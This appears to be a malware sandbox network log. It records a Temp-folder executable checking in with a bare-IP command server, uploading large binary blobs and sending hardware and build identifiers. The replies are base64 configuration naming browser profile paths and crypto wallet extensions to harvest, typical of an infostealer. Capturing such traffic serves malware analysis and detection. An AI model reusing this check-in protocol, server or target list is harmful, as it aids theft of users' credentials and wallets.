                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: 5d 19 b3 b2 20 cd 89 08 28 be 15 c3 1b ff 83 6b dc 06 ab 14 97 0b e7 c6 c4 da 37 be fd a0 3b c1 91 6e 6d 37 de ba 70 52 10 07 ed fb ff 2d 33 47 5e 1e 03 ef f7 1d 7f 96 1e dd 31 a3 e6 fd 09 f6 05 81 18 c3 b8 ce 14 8d f5 49 62 e6 53 7c c5 50 9c 1d 94 20 f5 58 98 1b 6b 72 bc d3 16 62 ec 93 ee 15 00 e7 52 32 1c 3d 70 a0 49 e1 b7 bd 19 3a 4e 2c cb b1 14 92 57 87 a9 62 5b c5 da 34 ff cd 8f 69 11 09 9f 4d 99 42 5d d2 de 4e 1c 28 76 98 27 9c fd 7b 52 9d 37 a5 93 48 ad b2 94 d3 1a 84 65 7b 8a 11 e3 c0 9b 2e 2e c1 14 9d c2 b0 28 e9 dc a6 40 57 05 76 bd 93 30 87 b4 a2 50 d3 71 3b d3 27 44 53 98 4c a2 75 22 c2 6d 43 7a e5 7b 30 6c 28 56 f0 28 c2 18 0b fb fd 82 d6 b8 df d9 8a 6d 2a d5 7d 42 b9 20 79 71 84 39 d1 72 79 cb 47 e9 fd 90 a9 5a 7d 85 fa c5 56 b3 2c 2a c5 0b
                                                            Data Ascii: ] (k7;nm7pR-3G^1IbS|P XkrbR2=pI:N,Wb[4iMB]N(v'{R7He{..(@Wv0Pq;'DSLu"mCz{0l(V(m*}B yq9ryGZ}V,*
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: fb ff 96 b0 28 60 e1 53 c2 20 40 09 ac a6 73 cf 21 81 82 32 f0 44 48 e1 ff 3b 2d 4a e5 24 ea eb 6b b4 2d 94 69 ce f0 de bb e8 8c 62 40 50 94 36 c8 29 d0 d4 5c d4 62 31 e4 17 2e cd 7f 98 ff 12 56 8b 4d ad 3d 80 85 c3 1e c6 77 48 86 88 ff 6d d8 7a ce f1 62 e9 5f 18 7b 88 9c ef 93 7b f1 f8 e8 eb 52 6e ee 92 30 6c 73 d8 bc 17 b4 ea 1a 02 0d cc c5 ed fa ad e8 7f 83 e9 4f 57 a4 0a 87 77 23 83 b9 04 35 6d 06 1e 59 18 8e 02 c9 87 94 d4 b9 71 1f 23 f8 77 28 77 7f 91 da bd e1 ee 27 9c 47 61 98 a0 aa 78 9e 7b c9 e9 f0 0c e1 3d 96 3c 52 1d 1b a4 be 9e b9 94 84 55 4a c3 4a 8b 65 d5 fa 4d 69 f3 5a 08 5a 1d 7c 38 e5 3c 11 de 95 e7 1f 8e 63 52 e7 55 dc bb 08 da 6e c0 1c d0 ef 05 9c 7f 54 6f 5a 8a f2 c2 a4 4e 0e 44 d9 6b 3a c2 fa 76 1f 94 26 b9 48 d9 1d ad 8d 8e 29 f9 62
                                                            Data Ascii: (`S @s!2DH;-J$k-ib@P6)\b1.VM=wHmzb_{{Rn0lsOWw#5mYq#w(w'Gax{=<RUJJeMiZZ|8<cRUnToZNDk:v&H)b
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: 21 75 aa 29 2c 8e de 54 6c 4a 93 e3 b9 e4 6a 88 8b 70 24 6a 36 06 db 79 30 3d 83 d2 f5 0c 10 c4 b6 ed a2 4b 24 2f c9 7e bf b0 6e be 6c c5 21 61 f0 37 5a c7 3f 2d 3e ee 2d 7e a6 7f ac a8 5f 4d 3c d4 df fc 7c 95 3f 79 18 ef 04 dd f2 4d f8 77 e7 f8 5c 51 47 fb 82 2d ca dc ea 91 1f 0f a5 69 85 af 1c 92 03 7f 8b 2c 79 42 1c db 80 78 f3 81 0a 54 e0 98 92 21 3e b3 b2 64 3b a1 c3 64 54 6a 80 ac 2e 1f ef 78 55 1d 7c fe 51 4e 31 4d 54 f5 f9 2d db 66 ab 22 81 a7 3e 4a d8 9f 59 c6 99 77 71 12 62 db 3a c4 2c b4 5a fc 71 93 92 28 91 d0 ce 8f 5a ba 75 d0 7c d3 26 e0 fa 47 b4 1a 78 54 fd fd 75 ed 4a cf 0a 5d 9f c3 28 b1 2f 41 55 68 d6 26 a7 ce e9 eb 92 53 cd d0 33 dd 08 e7 df 69 47 76 e7 3c 75 48 0e 2a 2e 5d 90 83 d5 53 fd 41 f5 28 1c 12 f1 a8 d9 63 42 8b 3e b1 a0 7b ef
                                                            Data Ascii: !u),TlJjp$j6y0=K$/~nl!a7Z?->-~_M<|?yMw\QG-i,yBxT!>d;dTj.xU|QN1MT-f">JYwqb:,Zq(Zu|&GxTuJ](/AUh&S3iGv<uH*.]SA(cB>{
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: 7f 4d f4 8d fd 60 42 97 7a 0a af 16 0d 36 d9 80 50 31 f8 32 b3 e0 78 fe d7 96 23 a7 ae 1a b2 c0 28 dc 83 f5 46 e0 4d ca d6 03 49 00 c3 90 f2 da 38 8f 6e fa 36 b9 c2 bd 0d 5e 77 28 e4 13 6c d2 b9 9c ca a8 7d 42 33 74 dd 82 23 85 b7 04 c9 42 32 f5 d1 2c 7e c4 7d 81 d2 a3 08 f1 c7 3b 33 22 e8 b0 92 dd 84 0e 93 96 b3 af 0e 92 4c 1a 26 6c 02 af f3 2d fd 9c b7 9f 64 b9 3d 4a f3 da b0 10 4e 9c 64 20 c5 cf a0 12 f9 6c 34 59 f0 44 f8 41 8d 46 ae 6a 2d ea f3 10 c3 83 fc 16 08 a9 cb e3 52 8a 6b 75 cf 89 4f 1c b1 f3 c2 f4 71 2e c2 51 5e d0 6f 11 dc cf 4c fa 57 00 76 9c 4b 5d 77 0e a7 97 6c f3 4f f1 81 f2 d7 b8 d6 89 f3 a3 f8 81 d0 62 5c 18 88 e7 21 3a 43 dd 7e 30 45 c4 89 c1 9e 61 1a 75 7b 9a dd ae 5a 43 1e e7 1f cd 42 0c 67 60 c2 16 74 ca 41 59 3e 9f 6d 38 05 0e f2
                                                            Data Ascii: M`Bz6P12x#(FMI8n6^w(l}B3t#B2,~};3"L&l-d=JNd l4YDAFj-RkuOq.Q^oLWvK]wlOb\!:C~0Eau{ZCBg`tAY>m8
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: dd 67 17 71 f8 c9 3d 49 2d c6 fa 58 ff 0b 0c 17 5e f2 e2 8d 41 d8 87 7f fc 44 34 b4 3d b9 55 f7 b8 08 2c a5 c0 b4 73 72 cb 53 2a e4 81 56 6d cf f7 b8 a8 78 ac 87 8d c4 06 cf a4 b1 d0 f0 37 bd 85 a5 07 b4 ac 40 6a c8 5d 7b b9 5a 94 10 2f 77 d7 09 f3 a7 44 c4 a0 2e 57 5f 98 63 1a a2 74 5b a6 10 93 66 1a 3f 76 71 6d ce ff ca 55 16 62 e2 12 d4 8b f3 8d 3d f9 bb 8f 08 0e 69 f0 20 ca bc 78 6f 6f cb b6 eb ac dd 77 93 81 10 23 f4 a8 c4 36 b6 d7 3a c9 0c 47 74 80 03 c5 4e 10 a7 c7 5c e3 0a 9f 44 52 0a 84 4d b4 1b 22 36 f9 23 8e b7 08 14 e7 9b a4 b8 c4 f7 54 6c 99 fe ac 14 ba c6 f3 ba 48 70 89 62 7e 92 bc dc 17 d9 e5 d4 84 22 00 93 34 3b af ab 13 73 42 f9 d1 dd 2a 44 4c 1e 6f 09 d0 58 8e cb 55 97 8e fc f4 20 b9 a0 21 c6 64 85 29 b2 78 7e bf 42 86 42 55 42 70 fd 3d
                                                            Data Ascii: gq=I-X^AD4=U,srS*Vmx7@j]{Z/wD.W_ct[f?vqmUb=i xoow#6:GtN\DRM"6#TlHpb~"4;sB*DLoXU !d)x~BBUBp=
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: c9 4d 97 5c a2 9f 3f 7c e3 f2 71 7b 37 cc 56 ec e2 9b 1f a7 69 d3 6c eb 24 b7 17 a1 b7 2d d5 73 e7 aa 99 02 eb 03 29 d5 ab d2 d3 9a f5 15 e8 07 39 f9 ff 95 6f 49 40 0d 52 f7 c9 c5 22 51 ad ba bc 84 07 a4 84 75 e1 a6 5f 7e ce 0e 78 63 7b f7 61 6b 37 8a 41 02 5b f8 f7 c8 7d 37 b1 08 ba 64 9b e5 04 ff 9d 75 67 d5 68 aa 0a ff d2 95 dd fb df df 69 21 95 6e db 42 cf 1f 98 68 2c 4a 4d cc 8e de 20 95 43 5d 90 c4 73 c1 e4 e3 b0 9d 6e 82 dc e7 81 9a 4a a9 bf f7 a0 c8 49 34 c1 09 3c 6e e9 54 79 e3 25 41 69 f1 f1 8b 7f de 97 05 3f cd 10 4b 24 80 9f 50 ee 0a 80 7e 95 9b f9 ef 4c 9b 5a 31 2a 77 5b 7d 7a 85 78 65 2f 91 71 3e 99 15 93 9e 30 a9 56 d5 9a 1e 93 fe fe 01 99 17 34 fe fc 15 9a 32 62 a6 45 1c fd 0c 07 dc c0 95 9e a6 a9 6c 51 ae e1 8f 27 37 f9 e2 84 ac cb 5f 27
                                                            Data Ascii: M\?|q{7Vil$-s)9oI@R"Qu_~xc{ak7A[}7dughi!nBh,JM C]snJI4<nTy%Ai?K$P~LZ1*w[}zxe/q>0V42bElQ'7_'
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: af ee 8f 23 d3 5d ee c9 eb b5 84 92 63 ee c8 8b 4c c4 93 0d 56 7f a8 c6 f9 57 08 09 23 7f cd a8 b5 7c c7 ea b6 06 2a 53 a8 52 ca 77 dc 09 eb 6f 0c 75 0f 1d b0 49 a7 ed ed c9 e9 f6 9b cb 6c 8c 4e 60 17 48 b1 b5 19 59 06 60 2f 83 04 8c e3 f6 3b b7 0a 9f 03 56 56 56 c9 39 f9 c6 8e d6 5f 37 be 87 04 80 d1 34 aa 6e 6c 44 f0 e3 cb d1 10 df 6e 87 29 36 15 01 53 21 04 f8 c6 cd 41 60 af 1e 94 23 e0 17 92 fc 9c f3 47 d2 96 91 de d6 ba 6a 0d ab 88 71 89 9e 8e 4e f7 2f e4 1f 62 56 6f ec 05 06 78 8d 0e 6c fa e4 4b 0e 21 19 b4 47 9a 54 6c 6a 49 bd 94 12 ff a6 9d fb 21 d1 ac 9f f9 96 7a fa 11 22 2a 0d 9d fa 74 51 60 00 3a 46 96 51 76 a2 41 67 b5 65 8e f3 7f 23 4d fa 85 06 5b 25 1c 64 5b ef 11 78 eb 52 72 ba 49 73 b5 96 cc 19 ab 1c 9b b6 56 74 09 f9 f4 60 c8 da 25 74 b8
                                                            Data Ascii: #]cLVW#|*SRwouIlN`HY`/;VVV9_74nlDn)6S!A`#GjqN/bVoxlK!GTljI!z"*tQ`:FQvAge#M[%d[xRrIsVt`%t
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: 95 b1 da 37 3b 08 b0 c0 68 4a 62 26 5d 23 52 05 fe 71 2d 17 23 4b 74 51 6d f5 46 09 32 48 2b f2 e5 f2 69 7b 9a 30 f7 9d bf 6e 06 6d b7 ac 22 ed 82 80 a5 dc f1 cb 50 19 f0 8f d9 66 63 6d aa cf 3e 6d 4d c6 e2 fa 4b c1 01 f9 b4 0a 95 ff c8 47 45 15 97 29 7f c1 49 d4 24 22 c1 12 18 cd b8 d8 eb ae 5f 49 60 f7 c8 bf 3b 80 da 54 ae f9 3b df 04 fd e0 79 d8 06 a3 f2 78 ab 71 c2 fa cd c4 2c 03 de e5 01 58 1a ad d2 b5 d9 64 84 82 17 9d 20 ce c1 2d 6b 56 66 9d b1 36 38 73 91 38 b1 51 34 19 b5 cc 93 83 26 2a 5a 11 3f aa b5 20 d5 85 ec 4a 3c 0b 05 1b 20 db 0d 20 ff 14 a6 f6 ae c9 14 04 2c 40 e9 99 cf a9 90 24 af 93 b4 f9 56 7f f8 34 94 59 06 e5 5c 8e 2c b5 8a 9e a3 13 96 b5 71 64 39 6e cc b2 af 5e 68 d0 48 b3 f5 d7 99 ec b3 3f 55 d4 dc 82 b2 4c c9 43 1f 0f 70 27 e5 c6
                                                            Data Ascii: 7;hJb&]#Rq-#KtQmF2H+i{0nm"Pfcm>mMKGE)I$"_I`;T;yxq,Xd -kVf68s8Q4&*Z? J< ,@$V4Y\,qd9n^hH?ULCp'
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: fa 76 18 4e 2e d4 70 d8 32 a8 fc a0 ab 5f 91 79 a4 2a 32 8d 01 b3 e1 d6 fa f3 ab 44 ca e6 ab 12 c4 85 e9 0c 1d 35 7f a5 88 70 25 f4 de a6 67 9f 86 20 72 2f 91 b2 52 da 9d c0 ed dd 52 2b 9f 06 8b e6 0b f1 66 d4 14 eb 9e 51 8b a4 0d ee c0 ff 26 2d cd 57 1e df 25 7a a7 72 de e2 91 27 6f 3b 6d ee fb 3d 5d 50 89 59 a0 ad 05 3b e8 b4 f3 47 eb 53 d2 f3 1c 3f 0e ff 50 69 1e 75 fe 4f 51 35 73 d2 f6 9d 53 84 7c 96 eb 59 ed 25 a4 54 e9 c8 fd bd 05 7c 9d 07 af 0c 06 87 89 85 46 27 f1 92 8e 51 67 f0 60 e0 48 54 de 59 ec f6 e9 6f 43 a7 3f 4a 58 ea ac f4 97 a2 10 94 7a f6 dc ae be 48 da a3 4d 2a 4b 4e 0c 24 cf 8a 33 5e 02 f2 39 83 3e 84 87 12 85 c1 f2 b0 da c2 0e 90 2b 40 e2 05 a7 54 ea 96 09 28 52 3a d6 1d 22 d6 3a 7f e7 df 07 92 6d 28 5c 3c 16 bb 78 0c 66 0a 9e 09 d5
                                                            Data Ascii: vN.p2_y*2D5p%g r/RR+fQ&-W%zr'o;m=]PY;GS?PiuOQ5sS|Y%T|F'Qg`HTYoC?JXzHM*KN$3^9>+@T(R:":m(\<xf
                                                            2024-05-27 13:24:13 UTC810INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:24:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=nfbkbpsdp5p3fqvob7njhtv817; expires=Fri, 20-Sep-2024 07:10:52 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNKhkKH%2Fb7KaO6rmG%2BsPkKbAin8vElp9wQh2GjNWMCFlhSPqKeqYuFRY229xIl%2BPM8ZHDFZj8MhZg2EEdpCjAPZleRMFUtJ469jOcP3fkQgYRrirnk2zOWFtrdUsb2MeEe0DYPA8qaCAp30%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a652e129ce5e68-EWR
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.85308737.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:12 UTC184OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:13 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.85308837.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:13 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 279
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:13 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 45 42 44 37 30 39 38 33 31 32 32 30 34 30 34 30 39 34 30 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d
                                                            Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="hwid"8EEBD70983122040409402-a33c7340-61ca-11ee-8c18-806e6f6e6963------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------
                                                            2024-05-27 13:24:14 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:14 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 3a1|1|1|1|40ccf8a0634bafd489cb1bfaaca1e051|1|1|1|1|1|50000|10


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.85308937.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:15 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAEC
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JJDBFCAEBFIJJKFHDAECCont
                                                            2024-05-27 13:24:15 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:15 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                            Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.85309137.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:16 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAK
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:16 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JDGIIJJDHDGCGDHIJDAKCont
                                                            2024-05-27 13:24:17 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:17 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                            Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.85309437.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:18 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 332
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:18 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GIIDBGDAFHJDHIDGDGIICont
                                                            2024-05-27 13:24:18 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:18 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
